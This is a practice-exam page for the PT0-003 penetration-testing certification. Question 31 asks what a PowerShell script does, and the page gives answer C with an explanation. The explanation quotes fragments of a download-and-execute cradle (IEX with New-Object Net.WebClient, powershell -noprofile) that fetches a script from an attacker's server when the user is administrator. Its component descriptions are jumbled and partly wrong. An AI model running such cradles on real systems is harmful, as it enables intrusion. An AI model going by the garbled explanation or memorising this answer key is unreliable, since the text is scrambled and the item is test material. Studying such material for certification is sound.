PT0-003 Question #31: Real Exam Question with Answer & Explanation

The correct answer is C: Conditionally stage and execute a remote script.. The provided PowerShell script does the following: 1. Identifies the currently logged-in user by retrieving the Windows identity: [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\ 2. Checks if the user is "administrator": If ($1 -eq "administrator") This ens

Submitted by carlos_mx· Mar 6, 2026Post-exploitation and Lateral Movement

Question

Given the following script: Which of the following is the penetration tester most likely trying to do?

Options

AChange the system's wallpaper based on the current user's preferences.
BCapture the administrator's password and transmit it to a remote server.
CConditionally stage and execute a remote script.
DLog the internet browsing history for a systems administrator.

Explanation

The provided PowerShell script does the following: 1. Identifies the currently logged-in user by retrieving the Windows identity: [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\ 2. Checks if the user is "administrator": If ($1 -eq "administrator") This ensures that only administrative users execute the next step. 3. Downloads and executes a remote script from echo IEX(New-Object | powershell -noprofile - - IEX (Invoke-Expression) executes the downloaded script in memory. retrieves the script from the attacker's server. - New-Object Net.WebClient runs the script without loading the user profile to remain - powershell -noprofile -

Topics

#command and control#remote execution#payload staging#post-exploitation

Community Discussion

No community discussion yet for this question.

Full PT0-003 Practice Browse All PT0-003 Questions